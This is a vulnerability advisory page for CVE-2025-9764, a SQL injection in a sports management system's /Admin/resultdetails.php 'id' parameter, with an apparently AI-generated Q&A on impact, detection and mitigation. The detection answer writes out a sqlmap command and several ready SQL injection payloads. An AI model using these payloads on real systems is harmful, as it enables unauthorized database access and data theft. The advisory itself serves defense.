CVE-2025-9764
BaseFortify
Publication date: 2025-09-01
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| angeljudesuarez | sports_management_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-9764 is a critical SQL injection vulnerability in version 1.0 of the itsourcecode Sports Management System, specifically in the /Admin/resultdetails.php file. The flaw occurs because the 'id' parameter is not properly validated or sanitized before being used in SQL queries. This allows attackers to inject malicious SQL code remotely without authentication, potentially gaining unauthorized access to the database, leaking or manipulating data, and even taking full control of the system. [1, 2, 3]
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized database access, allowing attackers to retrieve, modify, or delete sensitive information. It compromises the confidentiality, integrity, and availability of the system. Attackers can exploit this remotely without authentication, potentially causing data leakage, data manipulation, full system control, and service disruption. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the /Admin/resultdetails.php endpoint for SQL injection on the 'id' parameter. Tools like sqlmap can be used to automate detection. Example sqlmap command: sqlmap -u "http://target/Admin/resultdetails.php?id=1" --batch --dbs. Additionally, manual testing with payloads such as boolean-based blind, error-based, time-based blind, and UNION query injections can be performed. Example payloads include: - Boolean-based blind: id=TOUR-105" RLIKE (SELECT (CASE WHEN (4189=4189) THEN 0x544f55522d313035 ELSE 0x28 END)) AND "ANsX"="ANsX" - Error-based: id=TOUR-105" AND GTID_SUBSET(CONCAT(0x717a716b71,(SELECT (ELT(2812=2812,1))),0x716a6a7671),2812) AND "jURJ"="jURJ" - Time-based blind: id=TOUR-105" AND (SELECT 8681 FROM (SELECT(SLEEP(5)))hTwu) AND "lWLp"="lWLp" - UNION query: id=-8211" UNION ALL SELECT CONCAT(0x717a716b71,0x6a46616b6452494a666c4a584b697863634f79474954656170695a7056757a6174434a66544c5055,0x716a6a7671) # [1, 3]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include implementing prepared statements with parameter binding to prevent SQL injection, applying strict input validation and filtering on the 'id' parameter, and minimizing database user permissions by avoiding use of high-privilege accounts for routine operations. Regular security audits should be conducted to detect and remediate vulnerabilities promptly. If possible, replacing or updating the affected component or product is recommended to avoid exploitation. [1, 3, 2]